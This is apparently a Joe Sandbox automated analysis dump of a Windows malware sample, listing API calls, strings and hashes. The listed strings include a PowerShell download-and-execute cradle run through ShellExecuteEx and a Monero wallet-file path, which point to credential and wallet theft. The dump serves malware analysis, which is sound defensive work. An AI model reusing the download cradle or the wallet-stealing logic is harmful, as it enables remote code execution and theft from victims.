                                • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 00B8847B
                                • RegCloseKey.ADVAPI32(00000000), ref: 00B8848C
                                • RegCloseKey.ADVAPI32(00000000), ref: 00B88499
                                  • Part of subcall function 00B8A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00B8A7E6
                                • RegQueryValueExA.ADVAPI32(00000000,0093DCB0,00000000,000F003F,?,00000400), ref: 00B884EC
                                • lstrlen.KERNEL32(?), ref: 00B88501
                                • RegQueryValueExA.ADVAPI32(00000000,0093DC38,00000000,000F003F,?,00000400,00000000,?,?,00000000,?,00B90B34), ref: 00B88599
                                • RegCloseKey.ADVAPI32(00000000), ref: 00B88608
                                • RegCloseKey.ADVAPI32(00000000), ref: 00B8861A
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1485597816.0000000000B71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_b70000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Close$QueryValue$EnumOpenlstrcpylstrlenwsprintf
                                • String ID: %s\%s
                                • API String ID: 3896182533-4073750446
                                • Opcode ID: c91b1f52898ba592cb0962c91213f35e1577860670880de0e992ca095619301c
                                • Instruction ID: 69b8e7b6967821528e0f72d9e74d0dee22dfc20a0aafc075fc55dc5f8275840b
                                • Opcode Fuzzy Hash: c91b1f52898ba592cb0962c91213f35e1577860670880de0e992ca095619301c
                                • Instruction Fuzzy Hash: DF2107B5910218EBDB24DB54DC85FE9B3F8FB48700F40C2D9A609A6250DF71AA85CFE4
                                APIs
                                • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00B876A4
                                • RtlAllocateHeap.NTDLL(00000000), ref: 00B876AB
                                • RegOpenKeyExA.ADVAPI32(80000002,0092B6C8,00000000,00020119,00000000), ref: 00B876DD
                                • RegQueryValueExA.ADVAPI32(00000000,0093DDE8,00000000,00000000,?,000000FF), ref: 00B876FE
                                • RegCloseKey.ADVAPI32(00000000), ref: 00B87708
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1485597816.0000000000B71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_b70000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                • String ID: Windows 11
                                • API String ID: 3225020163-2517555085
                                • Opcode ID: 7db1daa6f6c5f210d02b747fe63adacca29de7c9494b6232d9eade502f931c31
                                • Instruction ID: 6d048d083d8943b2b41b5aac3b943e1cc29b4549f14cec6c3e47e71743b1be11
                                • Opcode Fuzzy Hash: 7db1daa6f6c5f210d02b747fe63adacca29de7c9494b6232d9eade502f931c31
                                • Instruction Fuzzy Hash: 97014FB9A44308FBDB00EBE8DC49F69B7F8EB48705F104595FA05D7390EA709900CB61
                                APIs
                                • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00B87734
                                • RtlAllocateHeap.NTDLL(00000000), ref: 00B8773B
                                • RegOpenKeyExA.ADVAPI32(80000002,0092B6C8,00000000,00020119,00B876B9), ref: 00B8775B
                                • RegQueryValueExA.ADVAPI32(00B876B9,CurrentBuildNumber,00000000,00000000,?,000000FF), ref: 00B8777A
                                • RegCloseKey.ADVAPI32(00B876B9), ref: 00B87784
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1485597816.0000000000B71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_b70000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                • String ID: CurrentBuildNumber
                                • API String ID: 3225020163-1022791448
                                • Opcode ID: 496728ced04c98a8a5b22bd604df69ab0aac3766e49ee3deba4cf07b65cdd4ff
                                • Instruction ID: ef851e0e5d4ba2ee078da6ce6c9772b39b90a31a648ec9124697ddc4a19b9ded
                                • Opcode Fuzzy Hash: 496728ced04c98a8a5b22bd604df69ab0aac3766e49ee3deba4cf07b65cdd4ff
                                • Instruction Fuzzy Hash: 4301F4B9A40308FBDB00DBE4DC49FAEB7B8EB44705F104595FA05E7391DA749900CB61
                                APIs
                                • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00B799EC
                                • GetFileSizeEx.KERNEL32(000000FF,?), ref: 00B79A11
                                • LocalAlloc.KERNEL32(00000040,?), ref: 00B79A31
                                • ReadFile.KERNEL32(000000FF,?,00000000,00B7148F,00000000), ref: 00B79A5A
                                • LocalFree.KERNEL32(00B7148F), ref: 00B79A90
                                • CloseHandle.KERNEL32(000000FF), ref: 00B79A9A
                                Memory Dump Source
                                • Source File: 00000000.00000002.1485597816.0000000000B71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_b70000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: File$Local$AllocCloseCreateFreeHandleReadSize
                                • String ID:
                                • API String ID: 2311089104-0
                                • Opcode ID: 1bbe5b45fe1d585cbf4deff921e12f5b36dee83bb52aa7ea58e3a4465d655416
                                • Instruction ID: d725c8ab0f22bb7a81f78bc95fd96740386b17d2d3c313cecbd50488d4b4a996
                                • Opcode Fuzzy Hash: 1bbe5b45fe1d585cbf4deff921e12f5b36dee83bb52aa7ea58e3a4465d655416
                                • Instruction Fuzzy Hash: C231F4B4A01209EFDB14DFA4C985BAE77F5FF48350F108198E915A7390D778AA41CFA1
                                APIs
                                • lstrcat.KERNEL32(?,0093DF08), ref: 00B847DB
                                  • Part of subcall function 00B88DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00B88E0B
                                • lstrcat.KERNEL32(?,00000000), ref: 00B84801
                                • lstrcat.KERNEL32(?,?), ref: 00B84820
                                • lstrcat.KERNEL32(?,?), ref: 00B84834
                                • lstrcat.KERNEL32(?,0092AE88), ref: 00B84847
                                • lstrcat.KERNEL32(?,?), ref: 00B8485B
                                • lstrcat.KERNEL32(?,0093D4F8), ref: 00B8486F
                                  • Part of subcall function 00B8A740: lstrcpy.KERNEL32(00B90E17,00000000), ref: 00B8A788
                                  • Part of subcall function 00B88D90: GetFileAttributesA.KERNEL32(00000000,?,00B71B54,?,?,00B9564C,?,?,00B90E1F), ref: 00B88D9F
                                  • Part of subcall function 00B84570: GetProcessHeap.KERNEL32(00000000,0098967F), ref: 00B84580
                                  • Part of subcall function 00B84570: RtlAllocateHeap.NTDLL(00000000), ref: 00B84587
                                  • Part of subcall function 00B84570: wsprintfA.USER32 ref: 00B845A6
                                  • Part of subcall function 00B84570: FindFirstFileA.KERNEL32(?,?), ref: 00B845BD
                                Memory Dump Source
                                • Source File: 00000000.00000002.1485597816.0000000000B71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_b70000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcat$FileHeap$AllocateAttributesFindFirstFolderPathProcesslstrcpywsprintf
                                • String ID:
                                • API String ID: 2540262943-0
                                • Opcode ID: 955d0c911d009a0b10e9de55e00052f4f29114c6d21b6ae7d7abb8e423fcf795
                                • Instruction ID: 1e2c4ae59d18d90e3f1cd3fc907cc227932f2226b7c866a420f07d91baf24d76
                                • Opcode Fuzzy Hash: 955d0c911d009a0b10e9de55e00052f4f29114c6d21b6ae7d7abb8e423fcf795
                                • Instruction Fuzzy Hash: 953180B6900308E7CB14FBB4DC85EED73BCAB58700F4045C9B31996191EE749789CBA5
                                APIs
                                  • Part of subcall function 00B8A740: lstrcpy.KERNEL32(00B90E17,00000000), ref: 00B8A788
                                  • Part of subcall function 00B8A9B0: lstrlen.KERNEL32(?,00938A70,?,\Monero\wallet.keys,00B90E17), ref: 00B8A9C5
                                  • Part of subcall function 00B8A9B0: lstrcpy.KERNEL32(00000000), ref: 00B8AA04
                                  • Part of subcall function 00B8A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00B8AA12
                                  • Part of subcall function 00B8A920: lstrcpy.KERNEL32(00000000,?), ref: 00B8A972
                                  • Part of subcall function 00B8A920: lstrcat.KERNEL32(00000000), ref: 00B8A982
                                  • Part of subcall function 00B8A8A0: lstrcpy.KERNEL32(?,00B90E17), ref: 00B8A905
                                • ShellExecuteEx.SHELL32(0000003C), ref: 00B82D85
                                Strings
                                • -nop -c "iex(New-Object Net.WebClient).DownloadString(', xrefs: 00B82CC4
                                • ')", xrefs: 00B82CB3
                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, xrefs: 00B82D04
                                • <, xrefs: 00B82D39
                                Memory Dump Source
                                • Source File: 00000000.00000002.1485597816.0000000000B71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_b70000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrcat$ExecuteShelllstrlen
                                • String ID: ')"$-nop -c "iex(New-Object Net.WebClient).DownloadString('$<$C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                • API String ID: 3031569214-898575020
                                • Opcode ID: e234fe36fc20c4b79f8027f13cc9faf2f536abb063c2ed0ffb0044671ba49177
                                • Instruction ID: 6552971a487fd303e7c021cbc9cf9b1efac2ed1e8fa61577f90f1f97ce4bdfbd
                                • Opcode Fuzzy Hash: e234fe36fc20c4b79f8027f13cc9faf2f536abb063c2ed0ffb0044671ba49177
                                • Instruction Fuzzy Hash: 8B41A271D102089BEB14FFA0C891BDDB7B8AF14300F5041AAF116B71A1DF786A4ACFA1
                                APIs
                                • LocalAlloc.KERNEL32(00000040,?), ref: 00B79F41
                                  • Part of subcall function 00B8A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00B8A7E6
                                  • Part of subcall function 00B8A740: lstrcpy.KERNEL32(00B90E17,00000000), ref: 00B8A788
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1485597816.0000000000B71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_b70000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$AllocLocal
                                • String ID: @$ERROR_RUN_EXTRACTOR$v10$v20
                                • API String ID: 4171519190-1096346117
                                • Opcode ID: 343ccf7519a7c25c34c494eb5e1bffa265e2e693dd9ef8adee256388f11e6080
                                • Instruction ID: 8e85c8a3cedb71a7b5129986bc83f7e1aeb736627a38b17263cd7fed618a505f
                                • Opcode Fuzzy Hash: 343ccf7519a7c25c34c494eb5e1bffa265e2e693dd9ef8adee256388f11e6080
                                • Instruction Fuzzy Hash: 11611075A10248DFDB28EFA8CC96FED77F5AF44300F008558F91A5B191EB746A05CBA2
                                APIs
                                • RegOpenKeyExA.ADVAPI32(80000001,0093D6B8,00000000,00020119,?), ref: 00B840F4
                                • RegQueryValueExA.ADVAPI32(?,0093DF80,00000000,00000000,00000000,000000FF), ref: 00B84118
                                • RegCloseKey.ADVAPI32(?), ref: 00B84122
                                • lstrcat.KERNEL32(?,00000000), ref: 00B84147
                                • lstrcat.KERNEL32(?,0093DE00), ref: 00B8415B
                                Memory Dump Source
                                • Source File: 00000000.00000002.1485597816.0000000000B71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_b70000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcat$CloseOpenQueryValue
                                • String ID:
                                • API String ID: 690832082-0
                                • Opcode ID: 522568b4b093392474a38611c43c72f2d2ab3a57a4eb471e97897e49dd383336
                                • Instruction ID: c08d065d9b064a786198d4fce7a0cb2f567f21b405f52bb24203c41480468059
                                • Opcode Fuzzy Hash: 522568b4b093392474a38611c43c72f2d2ab3a57a4eb471e97897e49dd383336
                                • Instruction Fuzzy Hash: 0641BC76D00208E7DB14FBA4DC46FED737DA758700F404998B61996181EA755B88CBF2
                                APIs
                                • GetSystemTime.KERNEL32(?), ref: 00B8696C
                                • sscanf.NTDLL ref: 00B86999
                                • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 00B869B2
                                • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 00B869C0
                                • ExitProcess.KERNEL32 ref: 00B869DA
                                Memory Dump Source
                                • Source File: 00000000.00000002.1485597816.0000000000B71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true
                                 • Associated: 00000000.00000002.1485586383.0000000000B70000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1485597816.0000000000C21000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1485597816.0000000000C2D000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1485597816.0000000000C52000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1485597816.0000000000DBA000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1485733803.0000000000DCE000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1485733803.0000000000F52000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1485733803.0000000001039000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1485733803.000000000105D000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1485733803.0000000001066000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1485733803.0000000001074000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1486112735.0000000001075000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1486222235.0000000001217000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1486238168.0000000001218000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_b70000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Time$System$File$ExitProcesssscanf
                                • String ID:
                                • API String ID: 2533653975-0
                                • Opcode ID: 1aa33bc3c9146ced3b05e7bdc7aed3e29cf3c4d23e1934c00875beedf9921959
                                • Instruction ID: 3233dd3550bb70bacd848f928e305b5c657f5ccf9fd827c5dbcfe35fad0023db
                                • Opcode Fuzzy Hash: 1aa33bc3c9146ced3b05e7bdc7aed3e29cf3c4d23e1934c00875beedf9921959
                                • Instruction Fuzzy Hash: C9219A75D14209EBCF04EFE8D945AEEB7B5FF48300F04856AE506E3250EB745605CBA5
                                APIs
                                • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00B87E37
                                • RtlAllocateHeap.NTDLL(00000000), ref: 00B87E3E
                                • RegOpenKeyExA.ADVAPI32(80000002,0092BB60,00000000,00020119,?), ref: 00B87E5E
                                • RegQueryValueExA.ADVAPI32(?,0093D478,00000000,00000000,000000FF,000000FF), ref: 00B87E7F
                                • RegCloseKey.ADVAPI32(?), ref: 00B87E92
                                Memory Dump Source
                                • Source File: 00000000.00000002.1485597816.0000000000B71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true
                                 • Associated: 00000000.00000002.1485586383.0000000000B70000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1485597816.0000000000C21000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1485597816.0000000000C2D000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1485597816.0000000000C52000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1485597816.0000000000DBA000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1485733803.0000000000DCE000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1485733803.0000000000F52000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1485733803.0000000001039000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1485733803.000000000105D000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1485733803.0000000001066000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1485733803.0000000001074000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1486112735.0000000001075000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1486222235.0000000001217000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1486238168.0000000001218000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_b70000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                • String ID:
                                • API String ID: 3225020163-0
                                • Opcode ID: 9765fdf31b89199567e4e4c5444fa2e6e6756b0ca7c5f27f504a9de38497a1cd
                                • Instruction ID: d0e6dcf857824e30a0aa2ff5fde03e9a86e35d54081e03718dedc2dcd237c764
                                • Opcode Fuzzy Hash: 9765fdf31b89199567e4e4c5444fa2e6e6756b0ca7c5f27f504a9de38497a1cd
                                • Instruction Fuzzy Hash: 44112BB1A44305EBD704DB98DD89F6BBBB8EB04711F204299F605E6690DB7498018BA1
                                APIs
                                • StrStrA.SHLWAPI(0093DD58,?,?,?,00B8140C,?,0093DD58,00000000), ref: 00B8926C
                                • lstrcpyn.KERNEL32(00DBAB88,0093DD58,0093DD58,?,00B8140C,?,0093DD58), ref: 00B89290
                                • lstrlen.KERNEL32(?,?,00B8140C,?,0093DD58), ref: 00B892A7
                                • wsprintfA.USER32 ref: 00B892C7
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1485597816.0000000000B71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true
                                 • Associated: 00000000.00000002.1485586383.0000000000B70000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1485597816.0000000000C21000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1485597816.0000000000C2D000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1485597816.0000000000C52000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1485597816.0000000000DBA000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1485733803.0000000000DCE000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1485733803.0000000000F52000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1485733803.0000000001039000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1485733803.000000000105D000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1485733803.0000000001066000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1485733803.0000000001074000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1486112735.0000000001075000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1486222235.0000000001217000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1486238168.0000000001218000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_b70000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpynlstrlenwsprintf
                                • String ID: %s%s
                                • API String ID: 1206339513-3252725368
                                • Opcode ID: c95f0bd0fa87c039a645be40e8b6d2c944d3a1c214bc30c33afd04a90906c2e2
                                • Instruction ID: f22fe6f0d86cce21a163e1565ba757c411c57b0cbd6fe399946fd835b541a23a
                                • Opcode Fuzzy Hash: c95f0bd0fa87c039a645be40e8b6d2c944d3a1c214bc30c33afd04a90906c2e2
                                • Instruction Fuzzy Hash: 76011E75500208FFCB04DFECC988EAE7BB9EF44350F148288F90A9B300C631AA40DBA5
                                APIs
                                • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00B712B4
                                • RtlAllocateHeap.NTDLL(00000000), ref: 00B712BB
                                • RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 00B712D7
                                • RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 00B712F5
                                • RegCloseKey.ADVAPI32(?), ref: 00B712FF
                                Memory Dump Source
                                • Source File: 00000000.00000002.1485597816.0000000000B71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true
                                 • Associated: 00000000.00000002.1485586383.0000000000B70000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1485597816.0000000000C21000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1485597816.0000000000C2D000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1485597816.0000000000C52000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1485597816.0000000000DBA000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1485733803.0000000000DCE000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1485733803.0000000000F52000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1485733803.0000000001039000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1485733803.000000000105D000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1485733803.0000000001066000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1485733803.0000000001074000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1486112735.0000000001075000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1486222235.0000000001217000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1486238168.0000000001218000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_b70000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                • String ID:
                                • API String ID: 3225020163-0
                                • Opcode ID: 608f9402d1162cc60f4f6758f557f6054d44e5042bf93ed892f5d47e1993ec13
                                • Instruction ID: 7ba4d30f353354874ed29eb377f933546fbbed73b4b4a9db98a8aaf77931cf69
                                • Opcode Fuzzy Hash: 608f9402d1162cc60f4f6758f557f6054d44e5042bf93ed892f5d47e1993ec13
                                • Instruction Fuzzy Hash: 4401C2B9A40308FBDB04DFD4DC59FAEB7B8EB48701F108155FA15D7280DA759A018B61
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1485597816.0000000000B71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true
                                 • Associated: 00000000.00000002.1485586383.0000000000B70000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1485597816.0000000000C21000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1485597816.0000000000C2D000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1485597816.0000000000C52000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1485597816.0000000000DBA000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1485733803.0000000000DCE000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1485733803.0000000000F52000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1485733803.0000000001039000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1485733803.000000000105D000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1485733803.0000000001066000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1485733803.0000000001074000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1486112735.0000000001075000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1486222235.0000000001217000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1486238168.0000000001218000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_b70000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: String___crt$Type
                                • String ID:
                                • API String ID: 2109742289-3916222277
                                • Opcode ID: d144431400925eb4b634f037c76627274e668b07e7464ad15968341341dfc045
                                • Instruction ID: d96c798e3de3a39b05e421aa789afc4a9b2b11611cf474aab31b7272f8fe16c6
                                • Opcode Fuzzy Hash: d144431400925eb4b634f037c76627274e668b07e7464ad15968341341dfc045
                                • Instruction Fuzzy Hash: 2A41F6B110075C5EDB269B24CD84FFB7FE8EB45704F1444E8E98A87192E2719A44CF30
                                APIs
                                • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,0000003C,?,000003E8), ref: 00B86663
                                  • Part of subcall function 00B8A740: lstrcpy.KERNEL32(00B90E17,00000000), ref: 00B8A788
                                  • Part of subcall function 00B8A9B0: lstrlen.KERNEL32(?,00938A70,?,\Monero\wallet.keys,00B90E17), ref: 00B8A9C5
                                  • Part of subcall function 00B8A9B0: lstrcpy.KERNEL32(00000000), ref: 00B8AA04
                                  • Part of subcall function 00B8A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00B8AA12
                                  • Part of subcall function 00B8A8A0: lstrcpy.KERNEL32(?,00B90E17), ref: 00B8A905
                                • ShellExecuteEx.SHELL32(0000003C), ref: 00B86726
                                • ExitProcess.KERNEL32 ref: 00B86755
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1485597816.0000000000B71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true
                                 • Associated: 00000000.00000002.1485586383.0000000000B70000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1485597816.0000000000C21000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1485597816.0000000000C2D000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1485597816.0000000000C52000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1485597816.0000000000DBA000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1485733803.0000000000DCE000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1485733803.0000000000F52000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1485733803.0000000001039000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1485733803.000000000105D000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1485733803.0000000001066000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1485733803.0000000001074000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1486112735.0000000001075000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1486222235.0000000001217000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1486238168.0000000001218000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_b70000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$ExecuteExitFileModuleNameProcessShelllstrcatlstrlen
                                • String ID: <
                                • API String ID: 1148417306-4251816714
                                • Opcode ID: f08b562f075367bab57920530d283f8e88e01cd41f7bf6b3fb5cc5c452075447
                                • Instruction ID: 7f8eaccb2dabeba4478971bb687fb60adde30f595cfcdcae03fc6ba3cb6454ee
                                • Opcode Fuzzy Hash: f08b562f075367bab57920530d283f8e88e01cd41f7bf6b3fb5cc5c452075447
                                • Instruction Fuzzy Hash: 4731FDB1801218EBDB14FB54DC95BDD77B8AF44300F8051D9F209A61A1DF746B49CFA6
                                APIs
                                • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00B90E28,00000000,?), ref: 00B8882F
                                • RtlAllocateHeap.NTDLL(00000000), ref: 00B88836
                                • wsprintfA.USER32 ref: 00B88850
                                  • Part of subcall function 00B8A740: lstrcpy.KERNEL32(00B90E17,00000000), ref: 00B8A788
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1485597816.0000000000B71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true
                                 • Associated: 00000000.00000002.1485586383.0000000000B70000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1485597816.0000000000C21000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1485597816.0000000000C2D000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1485597816.0000000000C52000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1485597816.0000000000DBA000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1485733803.0000000000DCE000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1485733803.0000000000F52000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1485733803.0000000001039000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1485733803.000000000105D000.00000040.00000001.01000000.00000003.sdmp
